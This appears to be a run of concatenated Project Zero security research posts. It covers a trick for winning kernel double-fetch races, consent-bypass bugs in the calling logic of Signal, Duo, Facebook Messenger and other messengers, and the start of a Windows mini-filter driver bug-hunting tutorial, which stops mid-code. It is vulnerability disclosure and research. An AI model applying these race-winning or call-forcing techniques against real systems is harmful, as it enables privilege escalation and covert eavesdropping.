All examples up to now only demonste the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see if our exploitation trick would do better.

PVOID* UserPointer = // controlled user-mode address

__try {

   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);①

   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));②

} __except {

   return GetExceptionCode();

}

On the face of it this doesn’t look massively different to previous examples, however in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API which checks the pointer is both at a user-mode address and the memory is writable. This is a commonly used idiom to verify a user supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user mode address to a kernel mode address the example would overwrite kernel memory. The behavior is harder to exploit with a probabilistic exploit as there are only two valid values of the pointer, either a user-mode address or a kernel mode address. If you’re brute forcing the pointer value then it’s possible to end up where both fetches read a user-mode pointer even though it might change to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram the first read from UserPointer is made ① and the resulting pointer value passed to ProbeForWrite. The ProbeForWrite API first checks if the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If the page is invalid or is not writable then an exception will be generated and caught by the example's __except block. This gives us our exploit opportunity, we can use the exploitation trick on the one of the user-mode pages which is being probed which will cause ProbeForWrite to generate a page fault we can trap ③. However as the address being probed is not the same as the one storing the pointer we can modify it to contain a kernel mode address while the request is trapped ④. The result is we can deterministically win the race.

Of course I’ve been focussing on kernel double fetches as it’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double-fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However if that didn't exist we could use this trick to detect and delay when the code was at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.

The thing to remember with this exploitation trick is it can be used to open up the window to win a timing race. In this case it’s similar to my previous work on oplocks, but instead for memory access. In fact the access to memory might be incidental to the vulnerable code, it doesn’t have to be a memory double fetch or necessarily even a TOCTOU vulnerability. For example you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user mode address we control then you can use it as a timing signal and to widen the exploitation window.

Conclusions

I’ve described an exploitation trick by combining SMB and the Cloud File API which can aid in demonstrating exploitation of certain types of the application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud File API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only from a normal user privilege.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read, limited to a granularity of 4KiB. For local access via the Cloud File API this will always populate the next 7 pages as well as part of the 32KiB read. If accessing a custom SMB server the read size can be reduced to 4KiB. Would prevent exploitation of certain bugs which require precise trapping only on a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.

From a practical perspective the trick presented here doesn’t significantly improve the win rates for traditional kernel double fetches outlined in the Bochspwn paper. Realistically for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if anything due to its simplicity of implementation. However the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal adjunct to the vulnerability.

The one shot nature of the trick also makes it of no real benefit to exploiting simple double fetch code paths. Also more complex code which might read and write to a memory address more than once before you get to the vulnerable code which might make managing traps more difficult.

The State of State Machines

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts.  WebRTC connections are created by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process which is called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP in whatever secure communication message is available to them, usually WebSockets for web applications, and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed, however, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, meanwhile others set up the peer-to-peer connection, and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.

Signal Messenger

I looked at Signal in September 2019, and at that time, the application had a calling setup that is very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective requiring user consent to transmit audio, but a specific check was not implemented.

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.

Duo

I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use Java bindings to integrate WebRTC, instead it uses C++ bindings. Moreover, it statically links WebRTC to a larger library (librtcR20.so, which is likely the rsys library mentioned in this article), so the symbols for calls to bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a branch of thrift. I loaded the librtcR20.so library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, so I could get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not very many functions fulfilled that criteria, so I was able to identify writeFieldBegin.

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the code is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.

```

struct Extmap{

        1: i32 id

        2: optional i32 uri

}

```

After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.

I did two things with this thrift definition.  First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly. This made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long and contain a lot of unnecessary definitions, and can not be processed by IDA. So I ended up compiling the generated source and loading it into IDA, and then exporting the structure definitions and importing them into another IDA instance where librtcR20.so was already loaded. A few fields had different sizes in my compilation versus Facebook’s, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, meanwhile most Facebook messages are handled by Java code, I looked for a native call with an appropriate name. I found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, and fed its byte array parameter in the generated deserializer, and it decoded incoming messages.

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.

Discussion

The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.

Conclusion

I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

 The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues being fixed I thought would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

This is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making a IO request. When handling responses the altitudes processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

bindflt                                 1       409800         0

WdFilter                               17       328010         0

storqosflt                              1       244000         0

wcifs                                   0       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                    14        40700         0

FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances which indicates the number of volumes that’s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus

------------- ------------  ----------------------  -----  --------

C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {

    { IRP_MJ_CREATE,

      0,

      PreCreateOperation,

      PostCreateOperation },

    { IRP_MJ_OPERATION_END }

};

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS

(*PFLT_PRE_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID *CompletionContext

    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

Name

Value

Description

FLT_PREOP_SUCCESS_WITH_CALLBACK

0

The callback was successful. Pass on the IO request and get a post-operation callback after completion.

FLT_PREOP_SUCCESS_NO_CALLBACK

1

The callback was successful. Pass on the IO request. No callback required.

FLT_PREOP_PENDING

2

Mark the IO operation as pending.

FLT_PREOP_DISALLOW_FASTIO

3

If handling a Fast IO operation, fail it to force the operation as a normal IO Request.

FLT_PREOP_COMPLETE

4

The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.

FLT_PREOP_SYNCHRONIZE

5

Synchronize the post-operation callback in the same thread.

FLT_PREOP_DISALLOW_FSFILTER_IO

6

Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS

(*PFLT_POST_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID CompletionContext,

    FLT_POST_OPERATION_FLAGS Flags

);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

Name

Value

Description

FLT_POSTOP_FINISHED_PROCESSING

0

The callback was successful. No further processing required.

FLT_POSTOP_MORE_PROCESSING_REQUIRED

1

Halts completion of the IO request. The operation will be pending until the filter driver completes it.

FLT_POSTOP_DISALLOW_FSFILTER_IO

2

Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you’ll find in a driver but omits security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain the access then the request is completed with no callback.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_IO_PARAMETER_BLOCK ps = &Data->Iopb->Parameters;

    DWORD access = ps->Create.SecurityContext->DesiredAccess;

    if ((access & FILE_WRITE_DATA) == 0) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    // Perform some operation...

}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system hand encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data, 

                                        PUNICODE_STRING TargetFileName){

  LuafvSetEcp(Data, TargetFileName);

  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;

  ExFreePool(FileObject->FileName.Buffer);

